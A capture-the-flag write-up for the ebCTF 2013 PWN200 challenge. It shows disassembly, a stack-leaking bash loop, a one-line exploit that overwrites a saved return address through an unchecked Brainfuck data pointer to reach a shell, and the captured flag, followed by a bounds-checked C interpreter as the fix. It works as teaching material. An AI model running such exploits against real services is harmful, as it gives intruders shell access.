ebCTF 2013 | PWN200 « Frainbuck Interderper » [Write Up]

« Pwn this service: 176.34.95.148 port 31313 »

We have a dynamically linked 32-bit ELF binary, running as a service on host 176.34.95.148, port 31313.

[hexpresso@archlin EBCTF]$ nc 176.34.95.148 31313
>> EINDBAZEN FRAINBUCK INTERDERPER READY.
> GIVE ME SOMETHING TO DANCE FOR: ...
0x00000000
0x00000000
0x00000000

THANKS FOR SUPPORTING US WITH YOUR BRAIN!

Disassembling the binary immediately turns up something interesting: an unused function that starts a shell (system(« /bin/sh »)). At this point we already know the goal will be to jump into <shell> at address 0x08048a6e 😉

As for the main procedure, it contains a single call to <bf_main>. That function reads from stdin and dispatches each input character to one of 8 cases through a switch statement.

08048a82 <main>:
8048a82:    55                       push   ebp
8048a83:    89 e5                    mov    ebp,esp
8048a85:    83 e4 f0                 and    esp,0xfffffff0
8048a88:    83 ec 10                 sub    esp,0x10
8048a8b:    8b 45 0c                 mov    eax,DWORD PTR [ebp+0xc]
8048a8e:    89 44 24 04              mov    DWORD PTR [esp+0x4],eax
8048a92:    8b 45 08                 mov    eax,DWORD PTR [ebp+0x8]
8048a95:    89 04 24                 mov    DWORD PTR [esp],eax
8048a98:    e8 6f fb ff ff           call   804860c <bf_main>
8048a9d:    c7 04 24 a0 8c 04 08     mov    DWORD PTR [esp],0x8048ca0
8048aa4:    e8 17 fa ff ff           call   80484c0 <puts@plt>
8048aa9:    b8 00 00 00 00           mov    eax,0x0
8048aae:    c9                       leave
8048aaf:    c3                       ret


08048a6e <shell>:
8048a6e:    55                       push   ebp
8048a6f:    89 e5                    mov    ebp,esp
8048a71:    83 ec 18                 sub    esp,0x18
8048a74:    c7 04 24 98 8c 04 08     mov    DWORD PTR [esp],0x8048c98  // "/bin/sh"
8048a7b:    e8 50 fa ff ff           call   80484d0 <system@plt>
8048a80:    c9                       leave
8048a81:    c3                       ret

Given the title, we can guess that <bf_main> is a Brainfuck interpreter. Here are some instructions of this language with their meanings.

.    output the byte at the data pointer.
>    increment the data pointer (to point to the next cell).
<    decrement the data pointer (to point to the previous cell).
+    increment (increase by one) the byte at the data pointer.
-    decrement (decrease by one) the byte at the data pointer.

Let’s execute the binary and give it bf commands to interpret. We can easily walk the stack with « > » and print its content with « . ». So, what do we have on the stack? The idea was to find addresses starting with 0x08048, i.e. addresses of the binary’s own instructions.

for i in {1..100}
do
    echo $i
    (python -c "print '>'*$i + '.' + '\n'") | nc 176.34.95.148 31313 | sed -n "/0x08048/p"
done

51
> GIVE ME SOMETHING TO DANCE FOR: 0x08048a9d
54
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab9
56
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab0
68
> GIVE ME SOMETHING TO DANCE FOR: 0x080482d8
79
> GIVE ME SOMETHING TO DANCE FOR: 0x08048520
85
> GIVE ME SOMETHING TO DANCE FOR: 0x08048520
87
> GIVE ME SOMETHING TO DANCE FOR: 0x08048541
88
> GIVE ME SOMETHING TO DANCE FOR: 0x08048a82
91
> GIVE ME SOMETHING TO DANCE FOR: 0x08048ab0
92
> GIVE ME SOMETHING TO DANCE FOR: 0x08048b20

Well, the first one, 0x08048a9d, is the return address of <bf_main>, in other words the saved EIP. Since we can write to the stack, changing this address to 0x08048a6e makes the function return into the start of <shell>. So we move the pointer to the 51st position and decrement the pointed byte 47 times (0x08048a9d – 0x08048a6e = 47).
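From the defender's side, the root cause is that the interpreter's data pointer walks the real stack with no bounds check. As an added example (not the challenge binary's code), here is a version of the five instructions listed above in which the tape is a separate buffer and the pointer is a range-checked index, so neither « > » nor « < » can ever leave it; TAPE_CELLS, bf_run, bf_check and bf_page_input_status are names chosen here, and the 32-cell tape size is constructed.

```c
#include <stddef.h>
#include <string.h>

#define TAPE_CELLS 32   /* constructed: a small tape keeps the overrun case easy to test */

enum bf_status { BF_OK = 0, BF_PTR_OUT_OF_RANGE = 1, BF_UNSUPPORTED = 2 };

/* Interpret the five instructions listed above over a tape that lives in its
 * own buffer, not in the interpreter's stack frame. The data pointer is an
 * index, and every '>' / '<' is range-checked before it takes effect, so no
 * program can read or write outside tape[0 .. cells-1]. Bytes emitted by '.'
 * are stored in out (up to out_len of them); *nout receives the total count. */
enum bf_status bf_run(const char *prog, unsigned char *tape, size_t cells,
                      unsigned char *out, size_t out_len, size_t *nout)
{
    size_t dp = 0, n = 0;
    memset(tape, 0, cells);
    for (const char *pc = prog; *pc; pc++) {
        switch (*pc) {
        case '>': if (dp + 1 >= cells) return BF_PTR_OUT_OF_RANGE; dp++; break;
        case '<': if (dp == 0)         return BF_PTR_OUT_OF_RANGE; dp--; break;
        case '+': tape[dp]++; break;
        case '-': tape[dp]--; break;
        case '.': if (n < out_len) out[n] = tape[dp]; n++; break;
        case ' ': case '\n': break;           /* whitespace is ignored */
        default:  return BF_UNSUPPORTED;      /* '[', ']', ',' not handled here */
        }
    }
    if (nout) *nout = n;
    return BF_OK;
}

/* Run prog on a fresh TAPE_CELLS-cell tape. */
enum bf_status bf_check(const char *prog, unsigned char *out, size_t out_len, size_t *nout)
{
    unsigned char tape[TAPE_CELLS];
    return bf_run(prog, tape, TAPE_CELLS, out, out_len, nout);
}

/* The input from the write-up (51 '>' then 47 '-'): with a checked pointer
 * it is refused at the first move past the end of the tape. */
enum bf_status bf_page_input_status(void)
{
    char prog[51 + 47 + 1];
    memset(prog, '>', 51);
    memset(prog + 51, '-', 47);
    prog[98] = '\0';
    return bf_check(prog, NULL, 0, NULL);
}
```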

The final exploit is:

[hexpresso@archlin EBCTF]$ (python -c 'print ">"*51 + "-"*47 '; cat) | nc 176.34.95.148 31313
>> EINDBAZEN FRAINBUCK INTERDERPER READY.
> GIVE ME SOMETHING TO DANCE FOR: id
uid=1001(frainbuck) gid=1001(frainbuck) groups=1001(frainbuck)
cat IM_A_FLAG

huzzah, you did it!

did you know that turing machines have ruined my life?

Here you go: ebCTF{b01ea01dab226a3a207f921cc451ff3a}